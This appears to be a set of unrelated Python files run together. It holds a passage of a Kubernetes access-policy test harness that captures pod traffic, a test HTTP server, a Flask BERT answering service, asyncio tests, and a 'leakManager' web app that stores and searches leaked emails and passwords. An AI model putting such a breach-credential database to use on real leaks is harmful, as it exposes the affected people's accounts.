stdin=cut_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
cut_p.stdout.close()
output = awk_p.communicate()[0]
if args.verbose >= 1:
print("Pod '" + name + "' ID: " + output)
return output
# Returns the pod IP
def get_pod_ip(self, name, context):
get_pods = shlex.split("kubectl --context {} get pods -o wide".format(context))
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, get_pods))))
get_pods_p = Popen(get_pods,
stdout=subprocess.PIPE,
universal_newlines=True)
grep = shlex.split("grep " + name)
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, grep))))
grep_p = Popen(grep,
stdin=get_pods_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
get_pods_p.stdout.close()
tr = shlex.split("tr -s ' '")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, tr))))
tr_p = Popen(tr,
stdin=grep_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
grep_p.stdout.close()
cut = shlex.split("cut -d ' ' -f 6")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, cut))))
cut_p = Popen(cut,
stdin=tr_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
tr_p.stdout.close()
awk = shlex.split("awk 'NR>1{print PREV} {PREV=$0} END{printf(\"%s\",$0)}'")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, awk))))
awk_p = Popen(awk,
stdin=cut_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
cut_p.stdout.close()
output = awk_p.communicate()[0]
if args.verbose >= 1:
print("Pod '" + name + "' IP: " + output)
return output
# Returns the IP of the service
def get_service_ip(self, name, context):
# kubectl get services | grep "adder" | tr -s ' ' | cut -d ' ' -f 5 | cut -d '/' -f 1
get_services = shlex.split("kubectl --context {} get services".format(context))
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, get_services))))
get_services_p = Popen(get_services,
stdout=subprocess.PIPE,
universal_newlines=True)
grep = shlex.split("grep " + name)
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, grep))))
grep_p = Popen(grep,
stdin=get_services_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
get_services_p.stdout.close()
tr = shlex.split("tr -s ' '")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, tr))))
tr_p = Popen(tr,
stdin=grep_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
grep_p.stdout.close()
cut = shlex.split("cut -d ' ' -f 3")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, cut))))
cut_p = Popen(cut,
stdin=tr_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
tr_p.stdout.close()
awk = shlex.split("awk 'NR>1{print PREV} {PREV=$0} END{printf(\"%s\",$0)}'")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, awk))))
awk_p = Popen(awk,
stdin=cut_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
cut_p.stdout.close()
output = awk_p.communicate()[0]
if args.verbose >= 1:
print("Pod '" + name + "' service IP: " + output)
return output
# Returns the port number of the service
def get_service_port(self, name, context):
# kubectl get services | grep "adder" | tr -s ' ' | cut -d ' ' -f 5 | cut -d '/' -f 1
get_services = shlex.split("kubectl --context {} get services".format(context))
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, get_services))))
get_services_p = Popen(get_services,
stdout=subprocess.PIPE,
universal_newlines=True)
grep = shlex.split("grep " + name)
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, grep))))
grep_p = Popen(grep,
stdin=get_services_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
get_services_p.stdout.close()
tr = shlex.split("tr -s ' '")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, tr))))
tr_p = Popen(tr,
stdin=grep_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
grep_p.stdout.close()
cut = shlex.split("cut -d ' ' -f 5")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, cut))))
cut_p = Popen(cut,
stdin=tr_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
tr_p.stdout.close()
second_cut = shlex.split("cut -d '/' -f 1")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, second_cut))))
second_cut_p = Popen(second_cut,
stdin=cut_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
cut_p.stdout.close()
awk = shlex.split("awk 'NR>1{print PREV} {PREV=$0} END{printf(\"%s\",$0)}'")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, awk))))
awk_p = Popen(awk,
stdin=second_cut_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
second_cut_p.stdout.close()
output = awk_p.communicate()[0]
if args.verbose >= 1:
print("Pod '" + name + "' service port: " + output)
return output
###############################################################################
# Test utility
# Call subprocess to execute shell command contained in inp
def subprocess_call(inp, lock=None):
command = shlex.split(inp)
if args.verbose >= 1:
if lock is not None:
lock.acquire()
try:
print("Command: [{}]".format(", ".join(map(str, command))))
finally:
lock.release()
else:
print("Command: [{}]".format(", ".join(map(str, command))))
process = subprocess.run(command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True)
output = process.stdout
if lock is not None:
lock.acquire()
try:
if args.verbose >= 2:
print(output)
finally:
lock.release()
else:
if args.verbose >= 2:
print(output)
return output
# Call subprocess to execute shell command contained in inp, uses custom shell
def subprocess_shell_call(inp, lock=None):
if args.verbose >= 1:
if lock is not None:
lock.acquire()
try:
print("Command: [{}]".format(shlex.split("".join(map(str, inp)))))
finally:
lock.release()
else:
print("Command: [{}]".format(shlex.split("".join(map(str, inp)))))
process = subprocess.run(inp,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
shell=True)
output = process.stdout
if lock is not None:
lock.acquire()
try:
if args.verbose >= 2:
print(output)
finally:
lock.release()
else:
if args.verbose >= 2:
print(output)
return output
# Call subprocess to execute sleep command contained in inp
# Only difference with 'subprocess_call' is that I want to print a message before the command
def sleep_call(inp, lock=None):
command = shlex.split(inp)
if args.verbose >= 1:
if lock is not None:
lock.acquire()
try:
print("Command: [{}]".format(", ".join(map(str, command))))
finally:
lock.release()
else:
print("Command: [{}]".format(", ".join(map(str, command))))
if lock is not None:
lock.acquire()
try:
if args.verbose >= 2:
print("Sleeping for " + command[-1] + " seconds...")
finally:
lock.release()
else:
if args.verbose >= 2:
print("Sleeping for " + command[-1] + " seconds...")
process = subprocess.run(command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True)
output = process.stdout
return output
# Sends request from src to dst with the specified request_type
def request(src, dst, request_type, lock):
# Sleeping for 3 seconds before POST
sleep_call("sleep 2", lock)
# While capture is running, POST request from owner to adder
if request_type == "GET":
subprocess_shell_call("kubectl --context " + src.context + " exec -it " + src.pod_id + " -c " + src.name + " -- curl --user " + src.name + ":password -X GET --header 'Accept: application/json' 'http://" + dst.service_ip + ":" + dst.service_port + "/api/" + dst.name + "' -v", lock)
else: # POST request
subprocess_shell_call("kubectl --context " + src.context + " exec -it " + src.pod_id + " -c " + src.name + " -- curl --user " + src.name + ":password -X POST --header 'Content-Type: application/json' --header 'Accept: text/html' -d '{ \"document\": \"Contents of the document\", \"document_name\": \"file_name_to_save\" }' 'http://" + dst.service_ip + ":" + dst.service_port + "/api/" + dst.name + "' -v", lock)
# Launches a packet capture, a request and fetches the capture file
# src, dst and capture_pod are Pod()
def request_capture(src, dst, request_type, capture_pod, interface): #TODO Fix parallel display
# Set filename for packet capture
capture_file = args.capture_dir + src.name + "-" + dst.name + "-" + request_type + "-" + capture_pod.name + "-" + interface + ".pcap"
# Lock for parallel processing access to output
lock = Lock()
# Start capturing on the eth0 interface of the tcpdump container of the owner pod
# -G SECONDS -W 1 : Run for SECONDS seconds
# -w FILE : specify the dump file
# -i INTERFACE : specify the interface
capture_p = Process(target=subprocess_shell_call, args=("kubectl --context " + capture_pod.context + " exec -it " + capture_pod.pod_id + " -c tcpdump -- tcpdump -G 5 -W 1 -w /tmp/capture.pcap -i " + interface, lock))
# Sends request
request_p = Process(target=request, args=(src, dst, request_type, lock))
# Start parallel capture and request
capture_p.start()
request_p.start()
# Wait for both processes
capture_p.join()
request_p.join()
# Copy capture to host machine
subprocess_shell_call("kubectl --context " + capture_pod.context + " cp " + capture_pod.pod_id + ":/tmp/capture.pcap -c tcpdump " + capture_file)
# Identify the capture to determine what to look for
# src.lo and dst.lo should display HTTP
# src.eth0 and dst.eth0 should display TLS
# bystander.lo and bystander.eth0 should display nothing
def id_capture(capture):
# Unpack items
capture_items = capture.split('.')[0].split('/')[-1].split('-')
capture_src, capture_dst, capture_request_type, capture_pod, interface = capture_items
if args.verbose >= 2:
print(capture_src, capture_dst, capture_request_type, capture_pod, interface)
# Return variable
return_code = ""
if capture_pod == capture_src and interface == "lo":
return_code = "SRC_LO"
elif capture_pod == capture_dst and interface == "lo":
return_code = "DST_LO"
elif capture_pod == capture_src and interface == "eth0":
return_code = "SRC_ETH0"
elif capture_pod == capture_dst and interface == "eth0":
return_code = "DST_ETH0"
elif capture_pod != capture_src and capture_pod != capture_dst and interface == "lo":
return_code = "BYSTANDER_LO"
elif capture_pod != capture_src and capture_pod != capture_dst and interface == "eth0":
return_code = "BYSTANDER_ETH0"
assert(return_code != ""), "The identity of capture " + capture + " could not be established."
if args.verbose >= 1:
print("Capture " + capture + ": " + return_code)
return return_code
# According to the capture and the ID, check if policy is enforced
def check_capture(capture, capture_id, authorization, pods):
# Capture does not exist
if not os.path.isfile(capture):
print('"{}" does not exist'.format(capture), file=sys.stderr)
terminate_app(-1)
# Unpack items from capture filename
capture_items = capture.split('.')[0].split('/')[-1].split('-')
capture_src, capture_dst, capture_request_type, capture_pod, interface = capture_items
capture_src_pod = get_pod(pods, capture_src)
capture_dst_pod = get_pod(pods, capture_dst)
capture_cap_pod = get_pod(pods, capture_pod)
if args.verbose >= 2:
print(capture_src, capture_dst, capture_request_type, capture_pod, interface)
# Open capture file with scapy
if args.verbose >= 1:
print("Opening {}...".format(capture))
scapy_capture = rdpcap(capture)
# Get sessions
sessions = scapy_capture.sessions()
if args.verbose >= 1:
pprint.pprint(sessions)
# Capturing was done on the source loopback
if capture_id == "SRC_LO":
# Flags for finding relevant sessions
found_src_dst_flow = False
found_dst_src_flow = False
# Error handling
found_request_type = False
# Return value
return_check = ""
# Find the relevant sessions in the capture
for session in sessions:
if args.verbose >= 1:
print(session)
# Unpack items from session
session_chunks = session.split(' ')
session_src = session_chunks[1]
session_dst = session_chunks[3]
# Relevant session: Source -> Destination
if session_src.split(':')[0] == capture_src_pod.pod_ip and session_dst == "127.0.0.1:15001":
# Found relevant session from source to destination
found_src_dst_flow = True
if args.verbose >= 2:
print("Found SRC -> DST")
for packet in sessions[session]:
if Raw in packet:
# Extract HTTP payload
payload = packet[Raw].load.decode()
if args.verbose >= 2:
print(payload)
# Check request type is consistent with expectations
if capture_request_type in payload:
found_request_type = True
# Request type was not consistent with expectations
if not found_request_type:
raise ValueError("Capture " + capture + ": Request type " + capture_request_type + " inconsistent with expectations.")
# Relevant session: Destination -> Source
elif session_src == capture_dst_pod.service_ip + ':' + capture_dst_pod.service_port and session_dst.split(':')[0] == capture_src_pod.pod_ip:
# Found relevant session from destination to source
found_dst_src_flow = True
if args.verbose >= 2:
print("Found DST -> SRC")
for packet in sessions[session]:
if Raw in packet:
# Extract HTTP payload
payload = packet[Raw].load.decode()
if args.verbose >= 2:
print(payload)
# Check response type
response_type = payload.splitlines()[0]
if args.verbose >= 2:
print("Capture response type: " + response_type)
# The request was a GET
if capture_request_type == "GET":
# Request was authorized
if response_type == "HTTP/1.1 200 OK":
if args.verbose >= 2:
print("Request was allowed.")
if authorization == "allow":
return_check = "OK"
else:
return_check = "KO"
# Request was denied
elif response_type == "HTTP/1.1 403 Forbidden":
if args.verbose >= 2:
print("Request was denied.")
if authorization == "deny":
return_check = "OK"
else:
return_check = "KO"
# The request was a POST
elif capture_request_type == "POST":
# Request was authorized
if response_type == "HTTP/1.1 201 Created":
if args.verbose >= 2:
print("Request was allowed.")
if authorization == "allow":
return_check = "OK"
else:
return_check = "KO"
# Request was denied
elif response_type == "HTTP/1.1 403 Forbidden":
if args.verbose >= 2:
print("Request was denied.")
if authorization == "deny":
return_check = "OK"
else:
return_check = "KO"
else:
raise ValueError("Capture " + capture + ": Unrecognized response type " + response_type + ".")
# No relevant session found
if not found_src_dst_flow or not found_dst_src_flow:
raise ValueError("Capture " + capture + ": Missing matching session.")
# TODO: Make more fine-grained tests to see if both sessions, or only one was missing
assert(return_check != ""), "Return check was never determined."
return return_check
# Capturing was done on the destination loopback
elif capture_id == "DST_LO" and authorization == "allow":
# Flags for finding relevant sessions
found_src_dst_flow = False
found_dst_src_flow = False
# Error handling
found_request_type = False
# Return value
return_check = ""
# Find the relevant sessions in the capture
for session in sessions:
if args.verbose >= 1:
print(session)
# Unpack items from session
session_chunks = session.split(' ')
session_src = session_chunks[1]
session_dst = session_chunks[3]
# Relevant session: Source -> Destination
if session_src.split(':')[0] == "127.0.0.1" and session_dst == "127.0.0.1:" + capture_dst_pod.service_port:
# Found relevant session from source to destination
found_src_dst_flow = True
if args.verbose >= 2:
print("Found SRC -> DST")
for packet in sessions[session]:
if Raw in packet:
# Extract HTTP payload
payload = packet[Raw].load.decode()
if args.verbose >= 2:
print(payload)
# Check request type is consistent with expectations
if capture_request_type in payload:
found_request_type = True
# Request type was not consistent with expectations
if not found_request_type:
raise ValueError("Capture " + capture + ": Request type " + capture_request_type + " inconsistent with expectations.")
# Relevant session: Destination -> Source
elif session_src == "127.0.0.1:" + capture_dst_pod.service_port and session_dst.split(':')[0] == "127.0.0.1":
# Found relevant session from destination to source
found_dst_src_flow = True
if args.verbose >= 2:
print("Found DST -> SRC")
for packet in sessions[session]:
if Raw in packet:
# Extract HTTP payload
payload = packet[Raw].load.decode()
if args.verbose >= 2:
print(payload)
# Check response type
response_type = payload.splitlines()[0]
if args.verbose >= 2:
print("Capture response type: " + response_type)
# The request was a GET
if capture_request_type == "GET":
# Request was authorized
if response_type == "HTTP/1.0 200 OK":
if args.verbose >= 2:
print("Request was allowed.")
if authorization == "allow":
return_check = "OK"
else:
return_check = "KO"
# Request was denied
elif response_type == "HTTP/1.1 403 Forbidden":
if args.verbose >= 2:
print("Request was denied.")
if authorization == "deny":
return_check = "OK"
else:
return_check = "KO"
# The request was a POST
elif capture_request_type == "POST":
# Request was authorized
if response_type == "HTTP/1.0 201 CREATED":
if args.verbose >= 2:
print("Request was allowed.")
if authorization == "allow":
return_check = "OK"
else:
return_check = "KO"
# Request was denied
elif response_type == "HTTP/1.1 403 Forbidden":
if args.verbose >= 2:
print("Request was denied.")
if authorization == "deny":
return_check = "OK"
else:
return_check = "KO"
else:
raise ValueError("Capture " + capture + ": Unrecognized response type " + response_type + ".")
# No relevant session found
if not found_src_dst_flow or not found_dst_src_flow:
raise ValueError("Capture " + capture + ": Missing matching session.")
# TODO: Make more fine-grained tests to see if both sessions, or only one was missing
assert(return_check != ""), "Return check was never determined."
return return_check
# Capturing was done on the source/destination external interface
elif capture_id == "SRC_ETH0" or capture_id == "DST_ETH0":
# Flags for finding relevant sessions
found_src_dst_flow = False
found_dst_src_flow = False
found_cleartext = False
# Return value
return_check = ""
# Find the relevant sessions in the capture
for session in sessions:
if args.verbose >= 1:
print(session)
# Unpack items from session
session_chunks = session.split(' ')
session_src = session_chunks[1]
session_dst = session_chunks[3]
# Relevant session: Source -> Destination
if session_src.split(':')[0] == capture_src_pod.pod_ip and session_dst == capture_dst_pod.pod_ip + ':' + capture_dst_pod.service_port:
# Found relevant session from source to destination
found_src_dst_flow = True
if args.verbose >= 2:
print("Found SRC -> DST")
for packet in sessions[session]:
if Raw in packet:
try:
payload = packet[Raw].load.decode()
found_cleartext = True
except:
if args.verbose >= 2:
print("No cleartext here...")
if found_cleartext:
return_check = "KO"
else:
return_check = "OK"
# Relevant session: Destination -> Source
elif session_src == capture_dst_pod.pod_ip + ':' + capture_dst_pod.service_port and session_dst.split(':')[0] == capture_src_pod.pod_ip:
# Found relevant session from destination to source
found_dst_src_flow = True
if args.verbose >= 2:
print("Found DST -> SRC")
for packet in sessions[session]:
if Raw in packet:
try:
payload = packet[Raw].load.decode()
found_cleartext = True
except:
if args.verbose >= 2:
print("No cleartext here...")
if found_cleartext:
return_check = "KO"
else:
return_check = "OK"
# No relevant session found
if not found_src_dst_flow or not found_dst_src_flow:
raise ValueError("Capture " + capture + ": Missing matching session.")
# TODO: Make more fine-grained tests to see if both sessions, or only one was missing
assert(return_check != ""), "Return check was never determined."
return return_check
# Capturing was done on a bystander or capturing was done on the destination loopback and the policy is "deny"
elif capture_id == "BYSTANDER_LO" or capture_id == "BYSTANDER_ETH0" or (capture_id == "DST_LO" and authorization == "deny"):
# Flags for finding relevant sessions
found_src_dst_flow = False
found_dst_src_flow = False
# Return value
return_check = ""
# Find the relevant sessions in the capture
for session in sessions:
if args.verbose >= 1:
print(session)
# Unpack items from session
session_chunks = session.split(' ')
session_src = session_chunks[1]
session_dst = session_chunks[3]
# Relevant session: Source -> Destination
if session_src.split(':')[0] == capture_src_pod.pod_ip and session_dst == capture_dst_pod.pod_ip + ':' + capture_dst_pod.service_port:
# Found relevant session from source to destination
found_src_dst_flow = True
if args.verbose >= 2:
print("Found SRC -> DST")
# Relevant session: Destination -> Source
elif session_src == capture_dst_pod.pod_ip + ':' + capture_dst_pod.service_port and session_dst.split(':')[0] == capture_src_pod.pod_ip:
# Found relevant session from destination to source
found_dst_src_flow = True
if args.verbose >= 2:
print("Found DST -> SRC")
# No relevant session found
if not found_src_dst_flow and not found_dst_src_flow:
return_check = "OK"
else:
return_check = "KO"
assert(return_check != ""), "Return check was never determined."
return return_check
else:
raise ValueError("Capture " + capture + ": Capture ID " + capture_id + " not valid.")
###############################################################################
# Main
#TODO Python doc string
if __name__ == "__main__":
print("\n\n###############################################################################")
print("Getting arguments")
print("###############################################################################")
# Create a parser
parser = get_parser()
# Parse arguments
args = parser.parse_args()
print(args)
print("\n\n###############################################################################")
print("Creating pod objects")
print("###############################################################################")
# Create pod objects
pods = []
for context in contexts:
context_pods = get_pods(context)
for pod in context_pods:
pods.append(Pod(pod, context))
for pod in pods:
print(pod)
if args.override_pods:
pod_ip_overrides = [i.split(':') for i in args.override_pods.split(", ")]
for override_pod, override_ip in pod_ip_overrides:
for pod in pods:
if pod.name == override_pod:
pod.pod_ip = override_ip
if args.no_capture:
with open("capture-metadata.dat") as capture_metadata:
for line in capture_metadata:
pod_chunks = line.split(')')[0].split('(')[-1].split(", ")
for pod in pods:
if pod.name == pod_chunks[0]:
pod.pod_ip = pod_chunks[2]
print("\n\n###############################################################################")
print("Capturing requests")
print("###############################################################################")
# Create capture dir
if not os.path.exists(args.capture_dir):
os.makedirs(args.capture_dir)
print("Created {}".format(args.capture_dir))
# Packet capture
if not args.no_capture:
# Capture metadata file
with open("capture-metadata.dat", "w+") as capture_metadata:
for pod in pods:
capture_metadata.write(repr(pod))
capture_metadata.write("\n")
# For each possible communication, capture on each possible interface
print("Capturing packets...")
for src in pods:
for dst in pods:
if src != dst:
for request_type in request_types:
for capture_pod in pods:
for interface in interfaces:
request_capture(src, dst, request_type, capture_pod, interface)
terminate_app(0)
print("\n\n###############################################################################")
print("Constructing AC matrix")
print("###############################################################################")
# Fetch policy from YAML configuration file and store it in policy
with open(args.policy_file) as policy_file:
# Isolate the opa-policy section
policy = policy_file.read().split("name: opa-policy")[-1]
if args.verbose >= 1:
print(policy)
# Get the default allow policy
default_allow = ""
for line in policy.split('\n'):
if "default allow" in line:
default_allow = line.split('=')[1].lstrip(' ')
assert(default_allow != ""), "A default policy must be defined."
if args.verbose >= 1:
print("default allow = " + default_allow)
# Fill authorized_comms with the default policy
if default_allow == "true":
authorized_comms = {src: {dst: {request_type: "allow" for request_type in request_types} for dst in pods if src != dst} for src in pods}
else:
authorized_comms = {src: {dst: {request_type: "deny" for request_type in request_types} for dst in pods if src != dst} for src in pods}
# Get role permissions from policy as a dictionary
role_perms = literal_eval(policy.split("role_perms = ")[1])
if args.verbose >= 1:
pprint.pprint(role_perms)
# According to the rest of the policy, change authorized_comms values needing change
for src in role_perms:
for comm in role_perms[src]:
dst = comm["path"].split('/')[-1]
request_type = comm["method"]
if args.verbose >= 1:
print("Modifying permission: " + src, dst, request_type)
authorized_comms[get_pod(pods, src)][get_pod(pods, dst)][request_type] = "allow"
if args.verbose >= 1:
pprint.pprint(authorized_comms)
print("\n\n###############################################################################")
print("Checking captures with AC matrix")
print("###############################################################################")
# Check capture files to confirm or infirm policy is enforced
# For each possible communication in authorized_comms
for communication in authorized_comms:
# Get all relevant packet captures
for src in authorized_comms:
for dst in authorized_comms[src]:
for request_type in authorized_comms[src][dst]:
# Pattern to match
pattern = src.name + "-" + dst.name + "-" + request_type + ".*\.pcap"
if args.verbose >= 1:
print(pattern)
# Captures like: "{src}-{dst}-{request_type}*.pcap"
captures = [args.capture_dir + capture for capture in os.listdir(args.capture_dir) if re.match(pattern, capture)]
if args.verbose >= 2:
print(captures)
print("{:10s} {:11s} {:4s} {:14s} {:6s} {}".format("SOURCE", "DESTINATION", "TYPE", "CAPTURE", "POLICY", "CHECK"))
for capture in captures:
# Identify the capture to determine what to look for
capture_id = id_capture(capture)
# According to the capture and the ID, check if policy is enforced
check = check_capture(capture, capture_id, authorized_comms[src][dst][request_type], pods)
print("{:10s} {:11s} {:4s} {:14s} {:6s} {}".format(src.name, dst.name, request_type, capture_id, authorized_comms[src][dst][request_type], check))
print("\n")
terminate_app(0)
###############################################################################
|
http_server.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""HTTP server for testing purposes."""
import threading
import json
from typing import Optional
from http.server import BaseHTTPRequestHandler, HTTPServer
class BaseHandler(BaseHTTPRequestHandler):
"""Base request handler for testing."""
def _get_code(self):
"""Get the status code to be returned."""
return 200
def _get_response_data(self):
"""Get the response data to be returned."""
return {}
def _respond(self):
"""Respond to the client."""
code = self._get_code()
self.send_response(code)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.rfile.read(int(self.headers.get('Content-Length', 0)))
if code == 200:
self.wfile.write(json.dumps(self._get_response_data()).encode(encoding='utf_8'))
def do_GET(self):
"""Process a GET request."""
# pylint: disable=invalid-name
self._respond()
def do_POST(self):
"""Process a POST request."""
# pylint: disable=invalid-name
self._respond()
def do_PUT(self):
"""Process a PUT request."""
# pylint: disable=invalid-name
self._respond()
class ServerErrorOnceHandler(BaseHandler):
"""Request handler that returns a server error once then a good response."""
valid_data = {}
bad_status_given = {}
def _get_code(self):
"""Return 200 if the path was seen before, otherwise 504."""
if self.bad_status_given.get(self.path):
return 200
self.bad_status_given[self.path] = True
return 504
def _get_response_data(self):
"""Return valid response data."""
return self.valid_data
class SimpleServer:
"""A simple test HTTP server."""
IP_ADDRESS = '127.0.0.1'
PORT = 8123
URL = "http://{}:{}".format(IP_ADDRESS, PORT)
def __init__(self, handler_class: BaseHandler, valid_data: Optional[dict] = None):
"""SimpleServer constructor.
Args:
handler_class: Request handler class.
valid_data: Data to be returned for a valid request.
"""
setattr(handler_class, 'valid_data', valid_data)
httpd = HTTPServer((self.IP_ADDRESS, self.PORT), handler_class)
self.server = threading.Thread(target=httpd.serve_forever, daemon=True)
def start(self):
"""Start the server."""
self.server.start()
|
index.py
|
#!/usr/local/bin/python3
# coding: utf-8
import hug
import time
import threading
from core.database import database
from core.templates import get_template
user,passwd = open('etc/leakManager.conf').read().split(':')
admin_area = hug.http(requires=hug.authentication.basic(hug.authentication.verify(user.strip(), passwd.strip())))
@admin_area.post('/massInsert',output=hug.output_format.html)
def massInsert(body,request,response):
leaks = str(body['leakmass']).replace("'b","").split('\\n')
count = len(leaks)
db = database()
thread = threading.Thread(target=db.saveMassLeaks, args=(leaks,))
thread.start()
message = 'You have loaded %d new leaks the process to register will happen in bakground!' % count
return "<script>alert('%s');document.location = '/'</script>" % message
@admin_area.post('/updatePassword')
def updatePassword(body):
db = database()
totalupdates = db.updatePassword(body['password-old'],body['password-new'])
message = '%d passwords were updated!' % totalupdates
return {"message":message}
@admin_area.get('/delete/{leakid}',output=hug.output_format.html)
def deleteLeak(leakid):
db = database()
db.deleteLeak(int(leakid))
message = 'leak deleted'
return "<script>alert('%s');document.location = '/'</script>" % message
@admin_area.post('/singleInsert')
def singleInsert(body):
checks = ['username','password','email','database']
for c in checks:
if c not in body:
return False
db = database()
db.insertLeak(username=body['username'],email=body['email'],password=body['password'],database=body['database'])
message = 'New leak created for e-mail %s' % body['email']
return {'message':message}
@admin_area.post('/search')
def search(body):
db = database()
results = list()
leaks = db.getLeaks(body['search'],body['searchby'])
for leak in leaks:
results.append({'id':leak.id,'email':leak.email,'username':leak.username,'password':leak.password,'database':leak.database})
return results
@admin_area.get('/',output=hug.output_format.html)
def index():
template = get_template('index.html')
db = database()
totalLeaks = db.getTotal()
lastLeaks = db.lastEntries()
return template.render({'total':totalLeaks,'leaks':lastLeaks})
@hug.static('/static')
def my_static_dirs():
return('static/',)
|
main.py
|
from transformers import AutoTokenizer, AutoModelForQuestionAnswering
from flask import Flask, request, jsonify, render_template
import torch
import torch.nn.functional as F
from queue import Queue, Empty
from threading import Thread
import time
app = Flask(__name__)
print("model loading...")
# Model & Tokenizer loading
tokenizer = AutoTokenizer.from_pretrained("./mrc-bert-base")
model = AutoModelForQuestionAnswering.from_pretrained("./mrc-bert-base")
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model.to(device)
requests_queue = Queue() # request queue.
BATCH_SIZE = 1 # max request size.
CHECK_INTERVAL = 0.1
print("complete model loading")
def handle_requests_by_batch():
while True:
request_batch = []
while not (len(request_batch) >= BATCH_SIZE):
try:
request_batch.append(requests_queue.get(timeout=CHECK_INTERVAL))
except Empty:
continue
for requests in request_batch:
try:
requests["output"] = make_answer(requests['input'][0], requests['input'][1])
except Exception as e:
requests["output"] = e
handler = Thread(target=handle_requests_by_batch).start()
def make_answer(context, question):
try:
encodings = tokenizer(context, question, max_length=512, truncation=True,
padding="max_length", return_token_type_ids=False)
encodings = {key: torch.tensor([val]) for key, val in encodings.items()}
input_ids = encodings["input_ids"].to(device)
attention_mask = encodings["attention_mask"].to(device)
pred = model(input_ids, attention_mask=attention_mask)
start_logits, end_logits = pred.start_logits, pred.end_logits
token_start_index, token_end_index = F.softmax(start_logits).argmax(dim=-1), F.softmax(end_logits).argmax(dim=-1)
answer_ids = input_ids[0][token_start_index: token_end_index + 1]
answer = tokenizer.decode(answer_ids)
result = dict()
result[0] = answer
return result
except Exception as e:
print('Error occur in script generating!', e)
return jsonify({'error': e}), 500
@app.route('/generate', methods=['POST'])
def generate():
if requests_queue.qsize() > BATCH_SIZE:
return jsonify({'Error': 'Too Many Requests'}), 429
try:
args = []
context = request.form['context']
question = request.form['question']
args.append(context)
args.append(question)
except Exception as e:
return jsonify({'message': 'Invalid request'}), 500
req = {'input': args}
requests_queue.put(req)
while 'output' not in req:
time.sleep(CHECK_INTERVAL)
return jsonify(req['output'])
@app.route('/queue_clear')
def queue_clear():
while not requests_queue.empty():
requests_queue.get()
return "Clear", 200
@app.route('/healthz', methods=["GET"])
def health_check():
return "Health", 200
@app.route('/')
def main():
return render_template('main.html'), 200
if __name__ == '__main__':
app.run(port=5000, host='0.0.0.0')
|
test_events.py
|
"""Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import gc
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import proactor_events
from asyncio import selector_events
from asyncio import sslproto
from asyncio import test_utils
try:
from test import support
except ImportError:
from asyncio import test_support as support
def data_file(filename):
if hasattr(support, 'TEST_HOME_DIR'):
fullname = os.path.join(support.TEST_HOME_DIR, filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(__file__), filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
def osx_tiger():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
PEERCERT = {'serialNumber': 'B09264B1F2DA21D1',
'version': 1,
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Nov 13 19:47:07 2022 GMT',
'notBefore': 'Jan 4 19:47:07 2013 GMT'}
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
